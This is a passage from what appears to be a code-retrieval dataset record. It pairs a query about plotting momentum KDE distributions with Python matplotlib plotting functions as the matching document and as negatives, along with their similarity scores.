plot_reconstruction_diagnostics(self, figsize=(20, 10)):\n figs = []\n fig_names = []\n\n # upsampled frequency\n fx_us = tools.get_fft_frqs(2 * self.nx, 0.5 * self.dx)\n fy_us = tools.get_fft_frqs(2 * self.ny, 0.5 * self.dx)\n\n # plot different stages of inversion\n extent = tools.get_extent(self.fy, self.fx)\n extent_upsampled = tools.get_extent(fy_us, fx_us)\n\n for ii in range(self.nangles):\n fig = plt.figure(figsize=figsize)\n grid = plt.GridSpec(3, 4)\n\n for jj in range(self.nphases):\n\n # ####################\n # separated components\n # ####################\n ax = plt.subplot(grid[jj, 0])\n\n to_plot = np.abs(self.separated_components_ft[ii, jj])\n to_plot[to_plot <= 0] = np.nan\n plt.imshow(to_plot, norm=LogNorm(), extent=extent)\n\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n if jj == 0:\n plt.title('O(f)otf(f)')\n plt.scatter(self.frqs[ii, 0], self.frqs[ii, 1], edgecolor='r', facecolor='none')\n plt.scatter(-self.frqs[ii, 0], -self.frqs[ii, 1], edgecolor='r', facecolor='none')\n elif jj == 1:\n plt.title('m*O(f-fo)otf(f)')\n plt.scatter(self.frqs[ii, 0], self.frqs[ii, 1], edgecolor='r', facecolor='none')\n elif jj == 2:\n plt.title('m*O(f+fo)otf(f)')\n plt.scatter(-self.frqs[ii, 0], -self.frqs[ii, 1], edgecolor='r', facecolor='none')\n\n plt.setp(ax.get_xticklabels(), visible=False)\n plt.setp(ax.get_yticklabels(), visible=False)\n\n plt.xlim([-2 * self.fmax, 2 * self.fmax])\n plt.ylim([2 * self.fmax, -2 * self.fmax])\n\n # ####################\n # deconvolved component\n # ####################\n ax = plt.subplot(grid[jj, 1])\n\n plt.imshow(np.abs(self.components_deconvolved_ft[ii, jj]), norm=LogNorm(), extent=extent)\n\n if jj == 0:\n plt.scatter(self.frqs[ii, 0], self.frqs[ii, 1], edgecolor='r', facecolor='none')\n plt.scatter(-self.frqs[ii, 0], -self.frqs[ii, 1], edgecolor='r', facecolor='none')\n elif jj == 1:\n plt.scatter(self.frqs[ii, 0], self.frqs[ii, 1], edgecolor='r', facecolor='none')\n elif jj == 2:\n plt.scatter(-self.frqs[ii, 0], -self.frqs[ii, 1], edgecolor='r', facecolor='none')\n\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n if jj == 0:\n plt.title('deconvolved component')\n plt.setp(ax.get_xticklabels(), visible=False)\n plt.setp(ax.get_yticklabels(), visible=False)\n\n plt.xlim([-2 * self.fmax, 2 * self.fmax])\n plt.ylim([2 * self.fmax, -2 * self.fmax])\n\n # ####################\n # shifted component\n # ####################\n ax = plt.subplot(grid[jj, 2])\n\n # avoid any zeros for LogNorm()\n cs_ft_toplot = np.abs(self.components_shifted_ft[ii, jj])\n cs_ft_toplot[cs_ft_toplot <= 0] = np.nan\n plt.imshow(cs_ft_toplot, norm=LogNorm(), extent=extent_upsampled)\n plt.scatter(0, 0, edgecolor='r', facecolor='none')\n\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n if jj == 1:\n circ2 = matplotlib.patches.Circle(-self.frqs[ii], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n elif jj == 2:\n circ2 = matplotlib.patches.Circle(self.frqs[ii], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n\n if jj == 0:\n plt.title('shifted component')\n plt.setp(ax.get_xticklabels(), visible=False)\n plt.setp(ax.get_yticklabels(), visible=False)\n\n plt.xlim([-2 * self.fmax, 2 * self.fmax])\n plt.ylim([2 * self.fmax, -2 * self.fmax])\n\n # ####################\n # normalized weights\n # ####################\n ax = plt.subplot(grid[jj, 3])\n\n to_plot = self.weights[ii, jj] / self.weight_norm\n to_plot[to_plot <= 0] = np.nan\n im2 = plt.imshow(to_plot, norm=LogNorm(), extent=extent_upsampled)\n im2.set_clim([1e-5, 1])\n fig.colorbar(im2)\n\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n if jj == 1:\n circ2 = matplotlib.patches.Circle(-self.frqs[ii], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n elif jj == 2:\n circ2 = matplotlib.patches.Circle(self.frqs[ii], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n\n if jj == 0:\n plt.title('normalized weight')\n plt.setp(ax.get_xticklabels(), visible=False)\n plt.setp(ax.get_yticklabels(), visible=False)\n\n plt.xlim([-2 * self.fmax, 2 * self.fmax])\n plt.ylim([2 * self.fmax, -2 * self.fmax])\n\n plt.suptitle('period=%0.3fnm at %0.3fdeg=%0.3frad, f=(%0.3f,%0.3f) 1/um\\n'\n 'mod=%0.3f, min mcnr=%0.3f, wiener param=%0.2f\\n'\n 'phases (deg) =%0.2f, %0.2f, %0.2f, phase diffs (deg) =%0.2f, %0.2f, %0.2f' %\n (self.periods[ii] * 1e3, self.angles[ii] * 180 / np.pi, self.angles[ii],\n self.frqs[ii, 0], self.frqs[ii, 1], self.mod_depths[ii, 1], np.min(self.mcnr[ii]), self.wiener_parameter,\n self.phases[ii, 0] * 180/np.pi, self.phases[ii, 1] * 180/np.pi, self.phases[ii, 2] * 180/np.pi,\n 0, np.mod(self.phases[ii, 1] - self.phases[ii, 0], 2*np.pi) * 180/np.pi,\n np.mod(self.phases[ii, 2] - self.phases[ii, 0], 2*np.pi) * 180/np.pi))\n\n figs.append(fig)\n fig_names.append('sim_combining_angle=%d' % (ii + 1))\n\n # #######################\n # net weight\n # #######################\n figh = plt.figure(figsize=figsize)\n grid = plt.GridSpec(1, 2)\n plt.suptitle('Net weight, Wiener param = %0.2f' % self.wiener_parameter)\n\n ax = plt.subplot(grid[0, 0])\n net_weight = np.sum(self.weights, axis=(0, 1)) / self.weight_norm\n im = ax.imshow(net_weight, extent=extent_upsampled, norm=PowerNorm(gamma=0.1))\n\n figh.colorbar(im, ticks=[1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 1e-2, 1e-3, 1e-4, 1e-5])\n\n ax.set_title(\"non-linear scale\")\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n circ2 = matplotlib.patches.Circle((0, 0), radius=2*self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n\n circ3 = matplotlib.patches.Circle(self.frqs[0], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ3)\n\n circ4 = matplotlib.patches.Circle(-self.frqs[0], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ4)\n\n circ5 = matplotlib.patches.Circle(self.frqs[1], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ5)\n\n circ6 = matplotlib.patches.Circle(-self.frqs[1], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ6)\n\n circ7 = matplotlib.patches.Circle(self.frqs[2], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ7)\n\n circ8 = matplotlib.patches.Circle(-self.frqs[2], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ8)\n\n ax.set_xlim([-2 * self.fmax, 2 * self.fmax])\n ax.set_ylim([2 * self.fmax, -2 * self.fmax])\n\n ax = plt.subplot(grid[0, 1])\n ax.set_title(\"linear scale\")\n im = ax.imshow(net_weight, extent=extent_upsampled)\n\n figh.colorbar(im)\n circ = matplotlib.patches.Circle((0, 0), radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ)\n\n circ2 = matplotlib.patches.Circle((0, 0), radius=2 * self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ2)\n\n circ3 = matplotlib.patches.Circle(self.frqs[0], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ3)\n\n circ4 = matplotlib.patches.Circle(-self.frqs[0], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ4)\n\n circ5 = matplotlib.patches.Circle(self.frqs[1], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ5)\n\n circ6 = matplotlib.patches.Circle(-self.frqs[1], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ6)\n\n circ7 = matplotlib.patches.Circle(self.frqs[2], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ7)\n\n circ8 = matplotlib.patches.Circle(-self.frqs[2], radius=self.fmax, color='k', fill=0, ls='--')\n ax.add_artist(circ8)\n\n ax.set_xlim([-2 * self.fmax, 2 * self.fmax])\n ax.set_ylim([2 * self.fmax, -2 * self.fmax])\n\n figs.append(figh)\n fig_names.append('net_weight')\n\n return figs, fig_names", "def app(ngr=100,c2a=1.6235):\n import matplotlib.pyplot as plt\n\n ## small donuts\n # plt.gcf().clf()\n grs = main(mu=0,ngrains=ngr,tilt_1=30.,sigma=15)\n plt.gcf().savefig('small_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='sm_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## Big donuts\n grs = main(mu=0,ngrains=ngr,tilt_1=50.,sigma=15)\n plt.gcf().savefig('big_doughnut.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='big_doughnut',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (30).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=30.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-30.,sigma=45)\n plt.gcf().clf()\n grs =[]\n for i in range(len(gr1)):\n grs.append(gr1[i])\n grs.append(gr2[i])\n grs=np.array(grs)\n mypf=upf.polefigure(grains=grs,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t30.pdf',bbox_inches='tight')\n f = gen_file(lab='dbl_lets_30',ngr=ngr)\n write_gr(f,grs)\n\n ## twin tilts (50).\n gr1=main(mu=0,ngrains=ngr/2,tilts_about_ax1=50.,sigma=45)\n plt.gcf().clf()\n gr2=main(mu=0,ngrains=ngr/2,tilts_about_ax1=-50.,sigma=45)\n plt.gcf().clf()\n gr =[]\n for i in range(len(gr1)):\n gr.append(gr1[i])\n gr.append(gr2[i])\n gr=np.array(gr)\n mypf=upf.polefigure(grains=gr,csym='hexag',cdim=[1,1,c2a])\n mypf.pf_new(poles=[[0,0,0,1],[1,0,-1,0]],cmap='jet',ix='TD',iy='RD')\n plt.gcf().savefig('t50.pdf',bbox_inches='tight')\n plt.gcf().clf()\n f = gen_file(lab='dbl_lets_50',ngr=ngr)\n write_gr(f,gr)", "def sysPLQF(mirror, blkFlag=True):\n import matplotlib.pyplot as plt\n import numpy as np # to ndarray.flatten ax\n\n mir = mirror\n xend = max(mir.r_t)\n\n fig, ax = plt.subplots(nrows=2, ncols=2,)\n ax = np.ndarray.flatten(ax)\n ax[0].set_title('Real Power Generated')\n for mach in mir.Machines:\n ax[0].plot(mir.r_t, mach.r_Pe, \n marker = 10,\n fillstyle='none',\n #linestyle = ':',\n label = 'Pe Gen '+ mach.Busnam)\n ax[0].set_xlabel('Time [sec]')\n ax[0].set_ylabel('MW')\n\n ax[2].set_title('Reactive Power Generated')\n for mach in mir.Machines:\n ax[2].plot(mir.r_t, mach.r_Q, \n marker = 10,\n fillstyle='none',\n #linestyle = ':',\n label = 'Q Gen '+ mach.Busnam)\n ax[2].set_xlabel('Time [sec]')\n ax[2].set_ylabel('MVAR')\n\n ax[1].set_title('Total System P Loading')\n ax[1].plot(mir.r_t, mir.r_ss_Pload, \n marker = 11,\n #fillstyle='none',\n #linestyle = ':',\n label = 'Pload')\n ax[1].set_xlabel('Time [sec]')\n ax[1].set_ylabel('MW')\n\n ax[3].set_title('System Mean Frequency')\n ax[3].plot(mir.r_t, mir.r_f,\n marker = '.',\n #linestyle = ':',\n label = r'System Frequency')\n ax[3].set_xlabel('Time [sec]')\n ax[3].set_ylabel('Frequency [PU]')\n\n # Global Plot settings\n for x in np.ndarray.flatten(ax):\n x.set_xlim(0,xend)\n x.legend()\n x.grid(True)\n\n fig.tight_layout()\n\n plt.show(block = blkFlag)", "def plot_ave(pulse, trap, ToP):\n time_array = np.linspace(0, pulse.t * trap.N, trap.N + 1)\n # fig, ax = plt.subplots()\n all_trial_n, all_trial_n_ave = trap.sideband_cool_sch(pulse, ave = True)\n if ToP == 'a':\n plt.plot(time_array * 1e3, all_trial_n_ave, label = pulse.t)\n if ToP == 'b':\n plt.plot(time_array * 1e3, all_trial_n_ave, color = 'magenta', linewidth = 3, label = 'Monte Carlo')\n if ToP == 'c':\n plt.plot(time_array * 1e3, all_trial_n_ave, color = 'b')\n if ToP == 'd':\n if trap.no_decay == True and trap.off_resonant_excite == False:\n plt.plot(time_array * 1e3, all_trial_n_ave, label = 'Decay to carrier')\n if trap.no_decay == False and trap.off_resonant_excite == False:\n plt.plot(time_array * 1e3, all_trial_n_ave, \n label = 'Decay to %s sideband'%(trap.sideband))\n if trap.no_decay == False and trap.off_resonant_excite == True:\n plt.plot(time_array * 1e3, all_trial_n_ave, \n label = 'Decay to %s sideband, off-resonant excite'%(trap.sideband))\n # plt.xlabel('time / ms')\n # plt.ylabel('Phonon State')\n # plt.legend()", "def plot_proof_functions():\n\n def thm1_D(x):\n return abs(1 / (2 + x) - 3 / (5 + x)) + abs(1 / (2 + x) - 2 / (5 + x))\n\n def thm2_D(x):\n return abs(2 / (2 + x) - (1 / 2) / ((1 / 2) + x))\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 2, 1000)\n\n plt.plot(x, thm1_D(x))\n plt.xlim(0, 2)\n plt.ylim(0.15, 0.22)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 6, 0, 2, linestyles='dashed', colors='grey', alpha=0.5)\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm1_D.pdf', bbox_inches='tight')\n plt.xticks(range(3), range(3))\n plt.close()\n\n print(f'Saved plot to: plots/thm1_D.pdf')\n\n plt.figure(figsize=(2, 1.5))\n x = np.linspace(0, 5, 1000)\n plt.vlines(1, 0, 1, linestyles='dashed', colors='grey', alpha=0.5)\n plt.hlines(1 / 3, 0, 5, linestyles='dashed', colors='grey', alpha=0.5)\n plt.plot(x, thm2_D(x))\n plt.xlim(0, 5)\n plt.ylim(0, 0.4)\n plt.xticks(range(6), range(6))\n\n plt.ylabel('$D(Z)$')\n plt.xlabel('$s_Z / t$')\n plt.savefig('plots/thm2_D.pdf', bbox_inches='tight')\n plt.close()\n\n print(f'Saved plot to: plots/thm2_D.pdf')", "def plotTI():\n min_dl = dlam[dlam != 0].min()\n S = int(0.4/min_dl)\n fig = pl.figure(figsize = (8,6))\n ax = fig.add_subplot(1,1,1)\n ax.spines['bottom'].set_position('zero')\n ax.spines['top'].set_color('none')\n ax.spines['right'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n for k, spine in ax.spines.items():\n spine.set_zorder(12.2)\n\n xs, ndx, dx = [0], 0, 0.001\n colors = ['r', 'g', '#7F38EC', '#9F000F', 'b', 'y']\n min_y, max_y = 0, 0\n\n lines = tuple()\n ## lv_names2 = [r'$Coulomb$', r'$vdWaals$'] ## for the paper\n lv_names2 = []\n for j in range(n_components):\n y = ave_dhdl[:,j]\n if not (y == 0).all():\n lv_names2.append(r'$%s$' % P.lv_names[j].capitalize())\n\n for j in range(n_components):\n\n y = ave_dhdl[:,j]\n if not (y == 0).all():\n\n # Get the coordinates.\n lj = lchange[:,j]\n x = lv[:,j][lj]\n y = y[lj]/P.beta_report\n\n if 'TI' in P.methods:\n # Plot the TI integration area.\n ss = 'TI'\n for i in range(len(x)-1):\n min_y = min(y.min(), min_y)\n max_y = max(y.max(), max_y)\n #pl.plot(x,y)\n if i%2==0:\n pl.fill_between(x[i:i+2]+ndx, 0, y[i:i+2], color=colors[ndx], alpha=1.0)\n else:\n pl.fill_between(x[i:i+2]+ndx, 0, y[i:i+2], color=colors[ndx], alpha=0.5)\n xlegend = [-100*wnum for wnum in range(len(lv_names2))]\n pl.plot(xlegend, [0*wnum for wnum in xlegend], ls='-', color=colors[ndx], label=lv_names2[ndx]) ## for the paper\n\n if 'TI-CUBIC' in P.methods and not cubspl[j]==0:\n # Plot the TI-CUBIC interpolation curve.\n ss += ' and TI-CUBIC'\n xnew = numpy.arange(0, 1+dx, dx)\n ynew = cubspl[j].interpolate(y, xnew)\n min_y = min(ynew.min(), min_y)\n max_y = max(ynew.max(), max_y)\n pl.plot(xnew+ndx, ynew, color='#B6B6B4', ls ='-', solid_capstyle='round', lw=3.0)\n\n else:\n # Plot the TI-CUBIC integration area.\n ss = 'TI-CUBIC'\n for i in range(len(x)-1):\n xnew = numpy.arange(x[i], x[i+1]+dx, dx)\n ynew = cubspl[j].interpolate(y, xnew)\n ynew[0], ynew[-1] = y[i], y[i+1]\n min_y = min(ynew.min(), min_y)\n max_y = max(ynew.max(), max_y)\n if i%2==0:\n pl.fill_between(xnew+ndx, 0, ynew, color=colors[ndx], alpha=1.0)\n else:\n pl.fill_between(xnew+ndx, 0, ynew, color=colors[ndx], alpha=0.5)\n\n # Store the abscissa values and update the subplot index.\n xs += (x+ndx).tolist()[1:]\n ndx += 1\n\n # Make sure the tick labels are not overcrowded.\n xs = numpy.array(xs)\n dl_mat = numpy.array([xs-i for i in xs])\n ri = range(len(xs))\n\n def getInd(r=ri, z=[0]):\n primo = r[0]\n min_dl=ndx*0.02*2**(primo>10)\n if dl_mat[primo].max()<min_dl:\n return z\n for i in r:\n for j in range(len(xs)):\n if dl_mat[i,j]>min_dl:\n z.append(j)\n return getInd(ri[j:], z)\n\n xt = [i if (i in getInd()) else '' for i in range(K)]\n pl.xticks(xs[1:], xt[1:], fontsize=10)\n pl.yticks(fontsize=10)\n #ax = pl.gca()\n #for label in ax.get_xticklabels():\n # label.set_bbox(dict(fc='w', ec='None', alpha=0.5))\n\n # Remove the abscissa ticks and set up the axes limits.\n for tick in ax.get_xticklines():\n tick.set_visible(False)\n pl.xlim(0, ndx)\n min_y *= 1.01\n max_y *= 1.01\n pl.ylim(min_y, max_y)\n\n for i,j in zip(xs[1:], xt[1:]):\n pl.annotate(('%.2f' % (i-1.0 if i>1.0 else i) if not j=='' else ''), xy=(i, 0), xytext=(i, 0.01), size=10, rotation=90, textcoords=('data', 'axes fraction'), va='bottom', ha='center', color='#151B54')\n if ndx>1:\n lenticks = len(ax.get_ymajorticklabels()) - 1\n if min_y<0: lenticks -= 1\n if lenticks < 5:\n from matplotlib.ticker import AutoMinorLocator as AML\n ax.yaxis.set_minor_locator(AML())\n pl.grid(which='both', color='w', lw=0.25, axis='y', zorder=12)\n pl.ylabel(r'$\\mathrm{\\langle{\\frac{ \\partial U } { \\partial \\lambda }}\\rangle_{\\lambda}\\/%s}$' % P.units, fontsize=20, color='#151B54')\n pl.annotate('$\\mathit{\\lambda}$', xy=(0, 0), xytext=(0.5, -0.05), size=18, textcoords='axes fraction', va='top', ha='center', color='#151B54')\n if not P.software.title()=='Sire':\n lege = ax.legend(prop=FP(size=14), frameon=False, loc=1)\n for l in lege.legendHandles:\n l.set_linewidth(10)\n pl.savefig(os.path.join(P.output_directory, 'dhdl_TI.pdf'))\n pl.close(fig)\n return", "def plot(self):\n\t\tself.plotOfSpect().plot()", "def make_plot(solution, t, plot_Ts, plot_T1, plot_T2, xaxis, cc, delta_cc, albedo,delta_albedo\\\n , em1, delta_em1, em2, delta_em2):\n\n plt.close('all')\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n \n if xaxis == 'cloud cover':\n inc_cc = []\n for i in range(len(solution[0,:])):\n inc_cc.append(cc + (i*delta_cc)/calcs_per_timestep)\n\n if plot_Ts == 'On': ax1.plot(inc_cc,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_cc,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_cc,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n\n elif xaxis == 'time':\n \n #for i in range(len(solution[0,:])):\n #t.append(i*(timestep/calcs_per_timestep))\n \n if plot_Ts == 'On': ax1.plot(t,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(t,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(t,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'albedo':\n inc_alb = []\n for i in range(len(solution[0,:])):\n inc_alb.append(albedo+(i*delta_albedo)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_alb,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_alb,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_alb,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'epsilon1':\n inc_em = []\n for i in range(len(solution[0,:])):\n inc_em.append(em1+(i*delta_em1)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_em,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_em,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_em,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n elif xaxis == 'epsilon2':\n inc_em = []\n for i in range(len(solution[0,:])):\n inc_em.append(em2+(i*delta_em2)/calcs_per_timestep)\n \n if plot_Ts == 'On': ax1.plot(inc_em,solution[0,:],label = 'Surface temperature')\n if plot_T1 == 'On': ax1.plot(inc_em,solution[1,:], label = 'Lower atmospheric temperature')\n if plot_T2 == 'On': ax1.plot(inc_em,solution[2,:], label = 'Upper atmospheric temperature')\n if plot_Ts == 'Off' and plot_T1 == 'Off' and plot_T2 == 'Off': raise ValueError('No y variable selected')\n \n else: raise ValueError('No x axis selected')\n \n fig.suptitle('Global Average Temperature')\n ax1.set_title(f'Final Surface Temperature = {round(solution[0,-1],2)} K')\n ax1.legend()\n\n if xaxis == 'cloud cover': ax1.set_xlabel('Cloud Cover (%)')\n elif xaxis == 'time': ax1.set_xlabel('Time (years)')\n elif xaxis == 'albedo': ax1.set_xlabel('Albedo')\n elif xaxis == 'epsilon1': ax1.set_xlabel(u'\\u03B5\\u2081')\n elif xaxis == 'epsilon2': ax1.set_xlabel(u'\\u03B5\\u2082')\n plt.ylabel('Temerature (K)')\n return fig" ]
[ "0.6821178", "0.64246243", "0.6286595", "0.626816", "0.6249688", "0.6224722", "0.6198306", "0.6154236", "0.613358", "0.61210513", "0.6096487", "0.6086529", "0.6069941", "0.598622", "0.59854215", "0.5982351", "0.59644985", "0.59618616", "0.59519553", "0.59491116", "0.59424275", "0.592379", "0.5919446", "0.59140146", "0.59031373", "0.58884037", "0.5883146", "0.5882376", "0.58612806", "0.5821942" ]
0.65401083
1
Make a paper plot for the momentum KDE of the lowfield, and fulldrift solutions.
def momentum_kde_paperplot(fields): fig, (ax1, ax2, ax3) = plt.subplots(nrows=3, sharex=True) axisList = [ax1,ax2,ax3] i =0 props = dict(boxstyle='round', facecolor='wheat', alpha=0.5) for ee in fields: ee_Vcm = ee/100 textstr = r'$E_{k_x}\, = \, %.1f \, V \, cm^{-1}$' % ee_Vcm k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + "E_{:.1e}.npy".format(ee)) kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + "E_{:.1e}.npy".format(ee)) kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + "E_{:.1e}.npy".format(ee)) kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + "E_{:.1e}.npy".format(ee)) kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + "E_{:.1e}.npy".format(ee)) axisList[i].fill(k_ax, kdist_2/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Cold '+r'$e^{-}$ '+r'$\Delta f$',color='blue') axisList[i].fill(k_ax, kdist_3/np.max(kdist_f0_2), '--', linewidth=1, alpha=0.6, label='Warm '+r'$e^{-}$ '+r'$\Delta f$',color='red') axisList[i].plot(k_ax, kdist_2/np.max(kdist_f0_2), '-', linewidth=1,color='blue') axisList[i].plot(k_ax, kdist_3/np.max(kdist_f0_2), '-', linewidth=1,color='red') axisList[i].plot(k_ax, kdist_f0_2/np.max(kdist_f0_2), '-', linewidth=1, label='Equilibrium Dist.',color='black') axisList[i].yaxis.set_major_formatter(FormatStrFormatter('%g')) axisList[i].locator_params(axis='y', nbins=3) axisList[i].locator_params(axis='x', nbins=5) axisList[i].set_xlim(-0.06,0.06) axisList[i].text(0.02, 0.92, textstr, transform=axisList[i].transAxes, verticalalignment='top', bbox=props) i = i+1 plt.xlabel(r'$k_x \, \, (\AA^{-1})$') ax2.set_ylabel('Occupation Probability (norm.)') axisList[0].legend(loc="upper right") plt.savefig(pp.figureLoc+'momentum_KDE.png', bbox_inches='tight',dpi=600)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def momentum_kde2_paperplot(fields):\n plt.figure(figsize=(2.65, 2.5))\n ax = plt.axes([0.18, 0.17, 0.8, 0.8])\n colorList = [med_color, high_color]\n lw = 1.5\n i = 0\n meankx_2 = []\n meankx_3 = []\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(fields[0]))\n # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color, label='Equilibrium')\n # ax.plot(k_ax, np.zeros(len(k_ax)), '-', linewidth=lw, color=eq_color)\n ax.axhline(0, color='black', linestyle='--', linewidth=0.5)\n # ax.axvline(0, color='gray', linewidth=0.8, alpha=0.5)\n for ee in fields:\n ee_Vcm = ee/100\n k_ax = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_ax_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_2 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '2_' + \"E_{:.1e}.npy\".format(ee))\n kdist_f0_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist_f0_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n kdist_3 = np.load(pp.outputLoc + 'Momentum_KDE/' + 'k_dist' + '3_' + \"E_{:.1e}.npy\".format(ee))\n\n chi_2_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(ee))\n meankx_2.append(utilities.mean_kx(chi_2_i, electron_df))\n chi_3_i = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '3_' + \"E_{:.1e}.npy\".format(ee))\n meankx_3.append(utilities.mean_kx(chi_3_i, electron_df))\n\n ax.plot(k_ax, kdist_2, '--', linewidth=lw, color=colorList[i], label='Cold '+r'{:.0f} '.format(ee/100)+r'$\\rm V cm^{-1}$')\n ax.plot(k_ax, kdist_3, '-', linewidth=lw,color=colorList[i], label='Warm '+r'{:.0f} '.format(ee/100)+r'$\\rm V cm^{-1}$')\n i = i + 1\n # ax.plot(k_ax, kdist_f0_3, '--', linewidth=lw, color='black', label=r'$f_0$')\n # ax.plot(meankx_2,np.mean(abs(kdist_2))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')\n # ax.plot(meankx_3,np.mean(abs(kdist_3))*np.ones(len(meankx_3)), '-', linewidth=lw, color='black')\n\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))\n ax.locator_params(axis='y', nbins=6)\n ax.locator_params(axis='x', nbins=6)\n # ax.tick_params(direction='in')\n ax.set_xlim(-0.085, 0.081)\n\n plt.xlabel(r'$\\rm k_x \\, \\, (\\AA^{-1})$')\n plt.ylabel(r'Deviational occupation $\\rm \\Delta f_{\\mathbf{k}}$')\n # plt.grid(lw=0.8, linestyle='dotted')\n # plt.ylabel(r'$\\delta f_{\\mathbf{k}}/f_{\\mathbf{k}}^0$')\n # plt.ylim([-1,1])\n plt.legend(frameon=False,prop={'size':different_small_size})\n plt.savefig(pp.figureLoc+'momentum_KDE2.png', dpi=600)", "def energy_kde_paperplot(fields,df):\n plt.figure()\n i = 0\n colorList = ['dodgerblue','tomato']\n lw = 2\n\n meanE_2 = []\n meanE_3 = []\n mup = np.min(df['energy [eV]']) - pp.mu\n chi_0 = np.load(pp.outputLoc + 'Steady/' + 'chi_' + '2_' + \"E_{:.1e}.npy\".format(fields[0]))\n g_en_axis, _, _, _, _, _, _, _, _, _, _, _, _, _ = \\\n occupation_plotter.occupation_v_energy_sep(chi_0, df['energy [eV]'].values, df)\n 